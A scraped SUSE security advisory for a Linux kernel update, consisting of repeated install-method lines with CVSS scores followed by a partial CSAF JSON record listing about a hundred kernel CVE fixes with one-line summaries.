To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.8 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThe SUSE Linux Enterprise 16.0 and SL MIxro 6.2 kernel was updated to fix various security issues\n\nThe following security issues were fixed:\n\n- CVE-2025-40147: blk-throttle: fix access race during throttle policy activation (bsc#1253344).\n- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).\n- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).\n- CVE-2025-40261: nvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).\n- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).\n- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).\n- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).\n- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).\n- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).\n- CVE-2025-68211: ksm: use range-walk function to jump over holes in scan_get_next_rmap_item (bsc#1255319).\n- CVE-2025-68218: nvme-multipath: fix lockdep WARN due to partition scan work (bsc#1255245).\n- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).\n- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).\n- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).\n- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).\n- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).\n- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).\n- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).\n- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).\n- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).\n- CVE-2025-68341: veth: reduce XDP no_direct return section to fix race (bsc#1255506).\n- CVE-2025-68348: block: fix memory leak in __blkdev_issue_zero_pages (bsc#1255694).\n- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).\n- CVE-2025-68356: gfs2: Prevent recursive memory reclaim (bsc#1255593).\n- CVE-2025-68359: btrfs: fix double free of qgroup record after failure to add delayed ref head (bsc#1255542).\n- CVE-2025-68360: wifi: mt76: wed: use proper wed reference in mt76 wed driver callabacks (bsc#1255536).\n- CVE-2025-68361: erofs: limit the level of fs stacking for file-backed mounts (bsc#1255526).\n- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).\n- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).\n- CVE-2025-68368: md: init bioset in mddev_init (bsc#1255527).\n- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).\n- CVE-2025-68374: md: fix rcu protection in md_wakeup_thread (bsc#1255530).\n- CVE-2025-68376: coresight: ETR: Fix ETR buffer use-after-free issue (bsc#1255529).\n- CVE-2025-68379: RDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure (bsc#1255695).\n- CVE-2025-68735: drm/panthor: Prevent potential UAF in group creation (bsc#1255811).\n- CVE-2025-68741: scsi: qla2xxx: Fix improper freeing of purex item (bsc#1255703).\n- CVE-2025-68743: mshv: Fix create memory region overlap check (bsc#1255708).\n- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).\n- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).\n- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).\n- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).\n- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).\n- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).\n- CVE-2025-68784: xfs: fix a UAF problem in xattr repair (bsc#1256793).\n- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).\n- CVE-2025-68792: tpm2-sessions: Fix out of range indexing in name_size (bsc#1256656).\n- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).\n- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).\n- CVE-2025-68799: caif: fix integer underflow in cffrml_receive() (bsc#1256643).\n- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).\n- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).\n- CVE-2025-68803: NFSD: NFSv4 file creation neglects setting ACL (bsc#1256770).\n- CVE-2025-68811: svcrdma: use rc_pageoff for memcpy byte offset (bsc#1256677).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).\n- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).\n- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).\n- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).\n- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).\n- CVE-2025-68821: fuse: fix readahead reclaim deadlock (bsc#1256667).\n- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).\n- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).\n- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).\n- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).\n- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).\n- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).\n- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).\n- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).\n- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).\n- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).\n- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).\n- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).\n- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).\n- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).\n- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).\n- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).\n- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).\n- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).\n- CVE-2025-71126: mptcp: avoid deadlock on fallback while reinjecting (bsc#1256755).\n- CVE-2025-71132: smc91x: fix broken irq-context in PREEMPT_RT (bsc#1256737).\n- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).\n- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).\n- CVE-2025-71137: octeontx2-pf: fix \"UBSAN: shift-out-of-bounds error\" (bsc#1256760).\n- CVE-2025-71148: net/handshake: restore destructor on submit failure (bsc#1257159).\n- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).\n- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).\n- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).\n- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).\n- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).\n- CVE-2026-22981: idpf: detach and close netdevs while handling a reset (bsc#1257225).\n- CVE-2026-22982: net: mscc: ocelot: Fix crash when adding interface under a lag (bsc#1257179).\n- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).\n- CVE-2026-22986: gpiolib: fix race condition for gdev-\u003esrcu (bsc#1257276).\n- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).\n- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).\n- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).\n- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).\n- CVE-2026-22996: net/mlx5e: Don\u0027t store mlx5e_priv in mlx5e_dev devlink priv.\n- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).\n- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).\n- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).\n- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).\n- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).\n\nThe following non security issues were fixed:\n\n- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).\n- Add bugnumber to an existing hv_netvsc change (bsc#1257473).\n- Fix locking issue introduced by a CVE backport (bsc#1256975 bsc#1254977).\n- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)\n- arm64: Update config files. Disable DEVPORT (bsc#1256792)\n- 